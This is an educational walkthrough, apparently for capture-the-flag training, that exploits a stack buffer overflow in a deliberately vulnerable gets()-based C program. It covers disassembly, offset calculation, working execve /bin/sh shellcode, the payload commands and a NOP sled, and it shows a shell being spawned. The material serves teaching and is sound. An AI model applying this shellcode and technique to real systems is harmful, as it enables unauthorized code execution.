You can get all of the files that this tutorial discusses here
In order to work on this exploit, we need to disable ASLR. This is a security feature that we will learn about later. To do this, issue the following command in your shell:
$ exec setarch linux32 -R /bin/bash
This will disable ASLR for your current shell. The rest of your OS, however, is still protected, so don't worry.
#include <stdio.h>

void vuln() {
    char buf[32];
    printf("What's your name? ");
    gets(buf);
    printf("Hi, %s!\n", buf);
}

int main() {
    vuln();
    return 0;
}
Can you spot the vulnerability in this function?
The vulnerability is the call to gets(buf). This function will read a string from standard input and put it in buf. The problem is that it does not check if buf is actually big enough to hold the result! It just keeps on writing characters, no matter what actually resides in memory. We can use this to exploit the program. Our attack will be a classic example of a buffer overflow exploit.
First, let's compile this file. It's already compiled in the tarball, but if you want to compile yourself the command is:
$ gcc -m32 -z execstack -fno-stack-protector vulnerable.c -o vulnerable
Note: If you compile yourself, the generated assembly may look slightly different from what is shown in this walkthrough due to different versions of gcc and system configurations. The -z execstack -fno-stack-protector flags are there in order to disable some security features that would complicate this introduction.
Let's play around with the executable:
$ ./vulnerable
What's your name? Blair
Hi, Blair!
$ ./vulnerable
What's your name? Blair Mason
Hi, Blair Mason!
$ python -c "print 'A'*256" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA!
Segmentation Fault
$
Looks like we got the program to crash! Why? Well, it makes sense if you take a look. The gets() function read in 256 'A's and just blindly wrote them into memory, starting at the address of buf. This is bound to run into something important and overwrite it. Let's take a look at what happened by checking the kernel error logs:
$ dmesg | tail
[442278.585208] vulnerable[30671]: segfault at 41414141 ip 0000000041414141
sp 00000000ffffd860 error 14
$
That error message (look for the one corresponding to your program) tells us that the segfault was triggered by trying to access memory address 0x41414141. What is 0x41 in ASCII? "A"! It also helps us by giving us the value of the instruction pointer (ip) and stack pointer (sp). Look at the value of the instruction pointer: 0x41414141. So the segfault was caused by the program trying to execute code starting at address 0x41414141.
Why did the program try to execute code from 0x41414141? Recall the x86 calling convention. The call instruction pushes the return address onto the stack and then jumps to the function. The ret instruction pops that address off the stack and then jumps to that address. However, what happens if the address is corrupted (overwritten) during the execution of the function? The ret instruction still happily pops the address off the stack and jumps to it! So now, we have a way to get the program to execute arbitrary code.
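To make the mechanism concrete, here is a toy model of a stack frame being overwritten. It is only a sketch: the frame layout (an 8-byte buffer, then a 4-byte saved ebp, then a 4-byte return address), the address 0x08048490, and the helper names are all made up for illustration and do not describe the real program.

```python
import struct

BUF_SIZE = 8  # hypothetical buffer size, for illustration only

def make_frame(ret_addr):
    """Build a toy frame: buffer, saved ebp, return address (low to high addresses)."""
    return bytearray(BUF_SIZE) + struct.pack("<I", 0) + struct.pack("<I", ret_addr)

def unchecked_copy(frame, data):
    """Copy data into the frame starting at the buffer, ignoring BUF_SIZE (like gets)."""
    frame[0:len(data)] = data
    return frame

def return_address(frame):
    """Read the 4-byte little-endian return address that ret would pop."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]

frame = make_frame(0x08048490)       # hypothetical "correct" return address
print(hex(return_address(frame)))    # 0x8048490
unchecked_copy(frame, b"A" * 16)     # 16 bytes into an 8-byte buffer
print(hex(return_address(frame)))    # 0x41414141
```

The second print shows the same 0x41414141 that turned up in the instruction pointer: the copy ran past the buffer and replaced the return address with four 'A's.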
Now, our goal is to get a little bit more specific information about the program so we can craft our exploit payload. Our goal will be to execute some arbitrary code. This code, we hope, will spawn us a shell. So, we'll call it our shellcode. Don't worry about the actual contents of this code for now - we'll cover that later.
We can get a look at the actual assembly code by using the objdump command:
$ objdump -d -Mintel vulnerable > vulnerable.asm
This gives us a dump of the assembly code. The dump has three columns. The first column is the address of the instruction. The second column is the sequence of bytes that exists in memory at that location. The third column is the assembly instructions that correspond to that machine code. Take a look at the vuln function (this isn't rocket science; just Ctrl+F or / for those of you awesome enough to be using less or vim):
08048434 <vuln>:
8048434: 55 push ebp
8048435: 89 e5 mov ebp,esp
8048437: 83 ec 38 sub esp,0x38
804843a: b8 50 85 04 08 mov eax,0x8048550
804843f: 89 04 24 mov DWORD PTR [esp],eax
8048442: e8 19 ff ff ff call 8048360 <printf@plt>
8048447: 8d 45 d8 lea eax,[ebp-0x28]
804844a: 89 04 24 mov DWORD PTR [esp],eax
804844d: e8 1e ff ff ff call 8048370 <gets@plt>
8048452: b8 63 85 04 08 mov eax,0x8048563
8048457: 8d 55 d8 lea edx,[ebp-0x28]
804845a: 89 54 24 04 mov DWORD PTR [esp+0x4],edx
804845e: 89 04 24 mov DWORD PTR [esp],eax
8048461: e8 fa fe ff ff call 8048360 <printf@plt>
8048466: c9 leave
8048467: c3 ret
Before we begin analyzing this function, make sure you follow the number one rule of reverse engineering assembly code: always draw out your stack! Make sure you use pencil so you can keep updating memory, or in the best case have a whiteboard available.
This function is pretty unremarkable. We first have our standard function prologue. Then, we subtract 0x38 from esp, which allocates 0x38 (56) bytes of space on the stack.
We then move an address into eax, and place that at the top of the stack. Then we call printf. Note that we don't push the arguments like we would if we were handwriting assembly. A lot of the time, compilers don't manually push/pop arguments but instead allocate a bit of extra space on the stack and just place arguments on the stack where they are supposed to go. So, the first argument to the function is at the top of the stack (i.e., [esp]), the second argument right below that on the stack (and thus right above it in memory, [esp+4]), the third at [esp+8], etc.
So how do we find out what the first argument to printf is? Well, we can figure it out by looking at the C code, but we do not always have that available. In that case, objdump comes to our rescue once again:
$ objdump -s vulnerable > vulnerable.dump
This file looks a lot like what you would see if you opened up a hex editor on RAM while running the program. The headers tell you which section you are in. For this case, the address we are looking for resides in the .rodata section, which is just like the .data section we used earlier except that the compiler has marked it as read only.
Contents of section .rodata:
8048548 03000000 01000200 57686174 27732079 ........What's y
8048558 6f757220 6e616d65 3f200048 692c2025 our name? .Hi, %
8048568 73210a00
When reading this dump, the first column is the memory address of the first byte displayed on that line. After that is a sequence of hexadecimal digits that show the contents of that memory starting at that address, one dword (4 bytes) per grouping and 16 bytes per line. After that is the ASCII representation corresponding to the contents you just saw in hex, with non-printable characters represented by periods. So, as you can see from the dump, the contents of memory at the address we passed to printf (0x8048550) is the string "What's your name? ".
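If you would rather not count bytes by hand, the lookup can be sketched in a few lines of Python. The hex words below are copied from the .rodata dump shown above; the helper name c_string_at is hypothetical, and the sketch assumes the strings are plain NUL-terminated ASCII.

```python
# Hex words copied from the .rodata dump, with the spaces removed.
RODATA_BASE = 0x8048548
RODATA = bytes.fromhex(
    "03000000" "01000200" "57686174" "27732079"
    "6f757220" "6e616d65" "3f200048" "692c2025"
    "73210a00"
)

def c_string_at(address, base=RODATA_BASE, data=RODATA):
    """Return the NUL-terminated ASCII string stored at `address`."""
    start = address - base              # offset of the address inside the section
    end = data.index(b"\x00", start)    # the string ends at the first NUL byte
    return data[start:end].decode("ascii")

print(repr(c_string_at(0x8048550)))  # "What's your name? "
print(repr(c_string_at(0x8048563)))  # 'Hi, %s!\n'
```

The second address, 0x8048563, is the one loaded into eax before the second call to printf in the disassembly.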
After calling printf, we load the address ebp-0x28 into eax, and place this address at the top of the stack. We then call gets. So, the buffer we want to overflow starts at address ebp-0x28. We also know from the calling convention that the return address will reside at ebp+4. So, there is a total of 0x28 + 4 = 0x2c = 44 bytes of space between the beginning of our buffer and the address we want to return to. In this case, we'll place our shellcode immediately after the return address in memory, so our payload will be: 44 bytes of junk ("A"*44) + Shellcode Address + Shellcode.
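The layout arithmetic can be written down as a short sketch. The offsets come from the disassembly above; build_payload is a hypothetical helper, and both 0xdeadbeef and the single 0xcc byte are placeholders standing in for the real address and shellcode.

```python
import struct

BUF_OFFSET = 0x28             # buffer starts at ebp-0x28 (from the disassembly)
RET_OFFSET = BUF_OFFSET + 4   # saved ebp takes 4 bytes, return address is at ebp+4

def build_payload(ret_addr, shellcode, filler=b"A"):
    """Lay out junk + little-endian return address + shellcode."""
    return filler * RET_OFFSET + struct.pack("<I", ret_addr) + shellcode

# Placeholder address and a one-byte stand-in for the shellcode.
payload = build_payload(0xdeadbeef, b"\xcc")
print(RET_OFFSET)        # 44
print(payload[44:48])    # b'\xef\xbe\xad\xde'
```

struct.pack("<I", ...) emits the address as four little-endian bytes, which is the byte order x86 expects to find on the stack.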
Shellcode is not incredibly complex assembly code. The goal of shellcode is to spawn a shell. The most common way to do this is by using the execve system call to run a shell; the code below runs /bin//sh, which resolves to the same file as /bin/sh. You can find the calling convention for system calls here.
[BITS 32]
; Note that we MUST have a valid stack for this to work!
xor ecx, ecx ; zero ecx
mul ecx ; edx:eax = eax*ecx, i.e. zeros edx and eax
mov al, 0xb ; set eax to 0xb, syscall number for execve
push ecx ; pushes a zero onto the stack (stack is \0\0\0\0)
push '//sh' ; push '//sh' onto stack (stack is //sh\0\0\0\0)
push '/bin' ; push '/bin' onto stack (stack is /bin//sh\0\0\0\0)
mov ebx, esp ; set ebx (arg1: path) to stack pointer ("/bin//sh")
push ecx ; push another zero (execve needs a NULL at the end)
push ebx ; push addr of "/bin//sh"
mov ecx, esp ; set ecx (arg2: argv) to ["/bin//sh", 0]
; edx (arg3: envp) is already NULL from `mul ecx`
int 0x80 ; perform system call
You should be able to figure out how that works if you look at the calling convention, read the man page for execve(2), look at those comments, and draw your stack out. If you have issues, come talk to me.
Now, we want to assemble this code out into a flat binary file:
$ nasm shell.asm -o shell
We can then use a small script to dump the shellcode as a string. The script (getascii):
#!/usr/bin/env python
import sys

if len(sys.argv) != 2:
    sys.stderr.write('USAGE: ' + sys.argv[0] + ' FILE\n')
    sys.exit(1)

# Read the whole file; bytearray yields integers on both Python 2 and 3.
with open(sys.argv[1], "rb") as f:
    data = bytearray(f.read())

# Emit every byte as a two-digit \xNN escape, wrapped in double quotes.
mystr = ''.join('\\x%02x' % b for b in data)
print('"' + mystr + '"')
chmod that script so you can use it, and then we'll run the script. I'm also going to save it into an environment variable to make things clearer in this tutorial, but you can just copy and paste if you want. With more complex payloads, it is actually useful to copy your shellcode into a python script as the payload will be a bit much for a one liner.
$ ./getascii shell
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x51\x53\x89\xe1\xcd\x80"
$ SHELLCODE=`./getascii shell`
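One thing worth checking before using the shellcode: gets() stops reading at the first newline, so a 0x0a byte anywhere in the payload would cut it short. Here is a quick sanity check, as a sketch; find_bad_bytes is a hypothetical helper and not one of the tutorial's files, and the bytes are copied from the getascii output above.

```python
SHELLCODE = (
    b"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x51\x53\x89\xe1\xcd\x80"
)

def find_bad_bytes(data, bad=b"\n"):
    """Return the offsets of any bytes in `data` that appear in `bad`."""
    return [i for i, b in enumerate(data) if b in bad]

print(len(SHELLCODE))             # 25
print(find_bad_bytes(SHELLCODE))  # []
```

An empty list means gets() will read the whole shellcode. Note that the 0x0b byte (the execve syscall number) is a vertical tab, not a newline, so it is harmless here.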
Now, we'll write our payload, with a dummy return to 0xdeadbeef to make sure that everything works. Note that the return address is converted into little endian:
$ python -c "print 'A'*44+'\xef\xbe\xad\xde'+$SHELLCODE" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAᆳQh//shh/binS!
Segmentation fault
$ dmesg | tail
[616178.375511] vulnerable[16929]: segfault at deadbeef ip 00000000deadbeef
sp 00000000ffffd860 error 14
Now, we see that the program segfaults accessing deadbeef, and that deadbeef is accessed because the program is trying to execute code at that location. This is good. So now, we want to change that deadbeef to the address of our shellcode. Once the ret instruction has popped the return address off the stack, the stack pointer points to whatever sits directly after the return address in memory (at the next higher address, which is the next item down the stack). Because of where we put our shellcode, this happens to be the shellcode itself! So, we can just fill in the stack pointer that dmesg gives us (NOTE: This will be different on your system!). Let's dump our payload into a file:
$ python -c "print 'A'*44+'\x60\xd8\xff\xff'+$SHELLCODE" > payload
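The four address bytes in that command are just the sp value from dmesg written in little endian. If you want to avoid flipping bytes by hand, something like the following sketch works. It assumes the log line has the same shape as the one shown above (the exact format can vary between kernels), and parse_segfault is a hypothetical helper.

```python
import re

DMESG_LINE = ("[616178.375511] vulnerable[16929]: segfault at deadbeef "
              "ip 00000000deadbeef sp 00000000ffffd860 error 14")

def parse_segfault(line):
    """Extract the faulting address, ip and sp (as ints) from a segfault log line."""
    m = re.search(r"segfault at ([0-9a-f]+) ip ([0-9a-f]+) sp ([0-9a-f]+)", line)
    if m is None:
        raise ValueError("not a segfault line")
    return tuple(int(g, 16) for g in m.groups())

addr, ip, sp = parse_segfault(DMESG_LINE)
print(hex(sp))                    # 0xffffd860
print(sp.to_bytes(4, "little"))   # b'`\xd8\xff\xff'
```

The backtick in the last output is simply how Python displays the byte 0x60, so these are the bytes \x60\xd8\xff\xff.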
Now, we execute our attack on this program. We want to first send our payload to the program, and then we need to send standard input over to the program so that we can send commands to the shell. So, the actual attack:
$ cat payload - | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAᆳQh//shh/binS!
ls
payload vulnerable vulnerable.asm vulnerable.c vulnerable.dump
whoami
m164122
Note that the shell will not give you any prompts; you just have to try typing commands and see if they work.
Congratulations! You've completed the helloworld of binary exploitation! Rejoice at the sight of your shell! After many long hours of staring at hexadecimal during a CTF it is the most beautiful sight in the world...
In some cases, you cannot precisely compute the address of your shellcode. In other cases, you might be feeling lazy and not want to bother to precisely compute the address you want to jump to. So, we use a technique called a NOP sled. NOP is a machine instruction, opcode 0x90, which essentially tells the machine to continue on to the next instruction. If we string a bunch of these together before our shellcode, then we can just guess an address. If the address we guess points to anywhere in our NOP sled the machine will walk along the sled and gladly continue on to our shellcode.
So, let's redesign our payload using a NOP sled. We can be much lazier when designing a NOP sled payload, as nothing has to line up perfectly - just good enough. Let's bring up the code for vuln again:
void vuln() {
    char buf[32];
    printf("What's your name? ");
    gets(buf);
    printf("Hi, %s!\n", buf);
}
We see that our buffer is 32 bytes long, and there are no other variables allocated on the stack. We know that the compiler is going to add in some other stuff/space on the stack, so let's just pick the next highest round number - 64 bytes (remember that round numbers are powers of 2 for us now!). We'll fill this up with copies of the address we want to write. The number of copies we'll need to write is 64 bytes / (4 bytes/copy) = 16 copies of the return address. Then, we'll add in a decent sized NOP Sled - let's say 256 NOPs. Last, our shellcode. Now, let's get a rough estimate for what address we should pick:
$ python -c "print 'A'*256" | ./vulnerable
What's your name? Hi, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA!
Segmentation Fault
$ dmesg | tail
[442278.585208] vulnerable[30671]: segfault at 41414141 ip 0000000041414141
sp 00000000ffffd850 error 14
We know our NOP sled is going to start somewhere around the vicinity of the stack pointer location at the crash. Our NOP sled is 256 = 0x100 bytes long, so we'll take half that (0x80) and add that to the stack pointer value at the crash to get 0xffffd8d0. That should be about midway through our NOP sled and thus give us the best chance of hitting. So, the moment of truth:
$ python -c "print '\xd0\xd8\xff\xff'*16+'\x90'*256+$SHELLCODE" > payload
$ cat payload - | ./vulnerable
What's your name? Hi, ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ1Qh//shh/binS!
ls
getascii payload shell shell.asm vulnerable vulnerable.c
How much easier was that? Draw out what memory should look like and convince yourself as to why it works. You need to have a solid understanding of how the first exploit (that we precisely calculated) works in order to really get why we can be lazy using this NOP sled. If you want to get an exploit quickly, the NOP sled is an important tool to decrease the amount of work you have to do. It also enables certain more advanced techniques that would be otherwise impossible. Once you get how these exploits work (by doing the first one a few times) you will appreciate the simplicity of not having to be exact about memory.
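If you want to check your drawing, here is a sketch of the same layout in Python. It assumes the sp value from the dmesg output above (yours will differ) and the 44-byte offset we computed for the precise exploit; build_sled_payload is a hypothetical helper, and the arithmetic assumes the stack sits at the same address on the real run as it did during the crash.

```python
import struct

SP_AT_CRASH = 0xffffd850   # sp from the dmesg output; differs per system
RET_OFFSET = 44            # distance from buf to the return address (0x28 + 4)
COPIES, SLED_LEN = 16, 256

def build_sled_payload(guess, shellcode):
    """Repeated return address, then the NOP sled, then the shellcode."""
    return struct.pack("<I", guess) * COPIES + b"\x90" * SLED_LEN + shellcode

guess = SP_AT_CRASH + SLED_LEN // 2
# After ret, sp points just past the return address, i.e. at payload offset 48.
payload_base = SP_AT_CRASH - (RET_OFFSET + 4)
sled_start = payload_base + 4 * COPIES
sled_end = sled_start + SLED_LEN

print(hex(guess))                       # 0xffffd8d0
print(sled_start <= guess < sled_end)   # True
```

Under those assumptions the sled covers 0xffffd860 up to 0xffffd960, so the guess lands inside it with plenty of room on either side. That slack is what lets us be lazy.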
This is a basic walkthrough on how to craft an exploit. However, we turned off a lot of common mitigation techniques that are in use on modern machines. We will go over some of these later, but the important thing to take away from this is the actual process of analysis, reverse engineering, payload crafting, and attack. In an actual competition, later levels will take some of this information away from you. They will place the program you need to exploit on a remote computer, so you no longer have nice diagnostics like dmesg to tell you how the program is failing. They will not give you C source code. They will turn on some (usually not all) of the mitigations that we turned off. BUT, the basic techniques and the workflow for exploiting the program are the same - the only thing that changes is some of the details on how to craft the payload.